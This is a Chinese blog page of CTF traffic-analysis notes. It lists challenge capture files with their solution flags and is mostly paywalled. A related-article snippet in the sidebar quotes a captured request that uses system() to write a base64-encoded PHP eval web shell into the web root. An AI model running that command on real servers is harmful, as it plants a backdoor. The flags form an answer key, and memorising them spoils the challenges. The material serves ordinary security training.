风二西CTF流量题大集合-刷题笔记|基础题(1)

最新推荐文章于 2024-12-13 18:31:35 发布
原创 最新推荐文章于 2024-12-13 18:31:35 发布 · 2.5k 阅读 · 31 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #python #网络安全 #笔记

本文集合了多个CTF挑战中的流量题,涉及明文、编码、Pwn攻击、网络协议分析等,强调自我分析和手动解码的重要性。解题关键在于观察、解码和安全漏洞利用。

题目链接:CTF流量题大集合

部分题目已包含脚本和解题视频,但更建议自行分析和手搓脚本

01.flag明文

key.pcapng

flag{This_is_a_f10g}

02.flag编码

64da5a4a1e024d198dfa307299965b6d.pcapng

flag{7FoM2StkhePz}

attack_log_analysis.pcap

flag{HI<BOY>YOU<GET>THE<FLAG>}

for1(题目提示pwn).pcapng

Pwnium{408158c115a82175de37e8b3299d1f93}

key.pcapng

flag{This_is_a_f10g}

可恶的黑客.pcapng

f1ag{si11yb0yemmm}

03.压缩包

caidao.pcapng

最低0.47元/天 解锁文章
zerorzeror
关注
CTF】实习培训WEB通关目整理011-9)
lanlanla的成长历程
07-31 768
首先,VM试了三种模式都连不上网的原因可能是服务没有开启 把这两个服务开了,就正常了: 还碰到一个问:在上课的时候,自己在虚拟机中打开wampserver服务后,电脑可以访问虚拟机的ip地址打开测试目环境。 但是现在自己在实验室就不可以了。 现在用的是NAT模式,好像说虚拟机可以访问电脑,但是电脑不可以访问虚拟机还是啥的。 我现在去改改Ip地址再换成桥接模式看看可不可以。 ...
wireshark流量分析学习
2301_80366980的博客
03-15 2648
仅供个人学习,如有冒犯请尽快联系记录一些流量分析的wp。
CTF-RSA_基础目及脚本
fengerxi33的博客
02-18 4935
CTF-RSA_基础目及脚本 随机生成flag import random import hashlib import string #字符串列表 a=string.printable #随机生成flag for i in range(10): flag = "" for i in range(10): flag += a[random.randint(0, 99)] flag = hashlib.md5(flag.encode()).hexdigest()
西CTF流量集合-笔记|基础(2)
zerorzeror的博客
01-22 7815
X老师知道Alice的RSA密钥为(n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13)?访问http://cff2016.oss-cn-shanghai.aliyuncs.com/AbTzA2YteFjGhPWCftraouVD3B684a9A.jpg,出现一个维码,扫进去得到flag。修复顺序:flag{n0th1ng_t0_533_h3r3_m0v3_0n}I春秋“迎圣诞,拿奖”活动赛目来源: ISCC-2017。
CTF——流量分析型整理总结
热门推荐
小锤队长的博客
12-19 5万+
我见过的流量分析类型的目总结: 一,ping 报文信息 (icmp协议) ,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例: 一,ping 报文信息 (icm...
西CTF流量集合-笔记|基础3
zerorzeror的博客
01-23 1456
Identification 反向16进制flag。后面去github拉flag,略。
精选资源
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
CTF-数据安全-记录(BUUCTF
最新发布
金州饿霸吃不饱的博客
12-13 1847
给定密文“ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30=”,需要解密得出明文,并将结果用flag{}提交。首先,观察密文可以发现既有小写字母又有写字母,并且密文末尾有“=”符号,这是Base64编码的常见特征。常用于将进制数据编码为ASCII字符串格式,以便于在文本中传输或存储。“=”在Base64编码中通常用作填充字符,以确保编码后的字符串长度是4的倍数。通过密文特征(包含小写字母和“=”填充字符),确定密文为Base64编码。
BUUCTF--------逆向笔记(持续更新ing)
qq_45616570的博客
03-14 1778
BUUCTF--------逆向笔记(持续更新ing) 01.easyre 解步骤 使用IDA进行打开 快捷键shift+F12查询字符串,再使用Ctrl+f查询关键字符串flag 得到flag 02.reverse1步骤 使用IDA进行打开 快捷键shift+F12查询字符串,再使用Ctrl+f查询关键字符串flag 右键上图的代码,选择List cross references to 进入IDA view-A界面,发现输入的hello_world
CTF流量分析经典例详解
qq_68163788的博客
01-03 1万+
CTF(Capture The Flag流量分析是网络安全竞赛中的重要环节,通过分析网络数据包来解决问。经典例包括网络流量分析、协议分析、恶意代码分析等。举例来说,一道经典的CTF流量分析目可能是给定一个pcap文件,要求分析其中的数据包,找出隐藏的信息或者发现异常行为。参赛者需要使用网络分析工具如Wireshark或tcpdump来分析数据包,识别各种协议如HTTP、FTP、DNS等,并根据特定的任务要求提取关键信息。另外,恶意代码分析也是CTF中常见的型,参赛者需要分析给定的恶意代码样本
CTF流量分析
Kiber
04-19 904
思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件。
ctf流量分析练习
gclome的博客
09-06 4130
上次的流量分析做的我一个脑袋两个!但是不能放弃啊,再找一些来练练手 0x01 经典CTF型主要分为流量包修复、WEB流量包分析、USB流量包分析和其他流量包分析。 01 流量包修复 比赛过程中有可能会出现通过wireshark打开目给的流量包后提示包异常的情况,如下图所示: 解思路: 通过在线pacp包修复工具进行修复: http://f00l.de/hacking/pcapfix.php 修复之后,再次打开 用tcp contains “flag”,找到了下面这句话: 于是乎,flag就在
CTF 流量包相关-流量分析(1)
qq_56815564的博客
04-28 1万+
前面的flag不论是直接给你明文,还是有一定的编码,都是比较简单的,像这些十成甚至九成都会是签到,所以了解一下知道有这种情况就好,重点不再这边另外这里还是给出一下佬的脚本吧,虽然我感觉用到的几率应该不会很,如果要用的话,那个破空查flag的工具应该会比较好用,下载的话,佬的git里面应该有,这里就不给了。
buuctf [第九章][9.4.1 鼠标流量分析]鼠标流量分析writeup
qq_49849300的博客
09-07 2167
当取0x00时,代表没有按键,当取0x01时,代表按左键,当取0x02时,代表当前按键为右键。当这个值为正时,代表鼠标水平右移多少像素 当这个值为负时,代表鼠标水平左移多少像素。三个字节与第字节类似,代表垂直上下移动的偏移。1.得到usbdata.txt。4.用gnuplot工具绘图。一般的鼠标流量都是四个字节。2.得到out.txt。
CTF之MISC-简单流量
fredricen的专栏
12-30 1万+
这是一道关于网络数据包分析的目,主要是wireshark工具的使用和发现代码、理解代码。同时要了解Linux 的 Shell脚本。
西CTF流量集合-笔记|NSSCTF流量1
zerorzeror的博客
01-22 2441
imgulfflagiswelcometfjnu 修正 imgulfflagiswelcometofjnu。
CTF流量分析常见()-USB流量
qwzf
08-01 2万+
0x00 前言 在学习Wireshark常见使用时,对常见CTF流量分析型和铁人三项流量分析的部分问进行了简单总结。由于篇幅过长,于是另起一篇总结常见流量包分析。包括USB流量包分析和一些其他流量包分析。 0x01 USB流量包分析 USB流量指的是USB设备接口的流量,攻击者能够通过监听usb接口流量获取键盘敲击键、鼠标移动与点击、存储设备的铭文传输通信、USB无线网卡网络传输内容等等。在CTF中,USB流量分析主要以键盘和鼠标流量为主。 1、键盘流量 USB协议数据部分在Leftover Capt
CTF——MISC习讲解(流量分析winshark系列~
tlovejr的博客
03-15 5889
CTF——MISC习讲解(流量分析winshark系列) 前言 上一章节我们已经做完一场流量分析杂项目,接下来继续给家讲解流量分析系列。 一、misc4 打开目后除了一个流分包还有一个txt文档 既然都这么告诉了,那就直接在统计里寻找一下这个特殊的PHP文件 然后直接在界面搜索一下这个文件看看 直接能得到flag,其实这个也就是基础,并不是太难,只要会统计这个功能几乎就可以的。 flag{FLAG-GehFMsqCeNvof5szVpB2Dmjx} 、telnet 打开目后发现还是有一
攻防世界 wireshark-1
peng_xingang的博客
11-22 1120
攻防世界wireshark-1 下载附件,放到linux下面用strings扫一下。 strings dianli_jbctf_MISC_T10075_20150707_wireshark.pcap |grep flag 根据http的src结构,以及干描述,密码即为flag,那么flag就直接被我们扫出来啦。 flag{ffb7567a1d4f4abdffdb54e022f8facd} 提交成功。 ...
评论 5
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值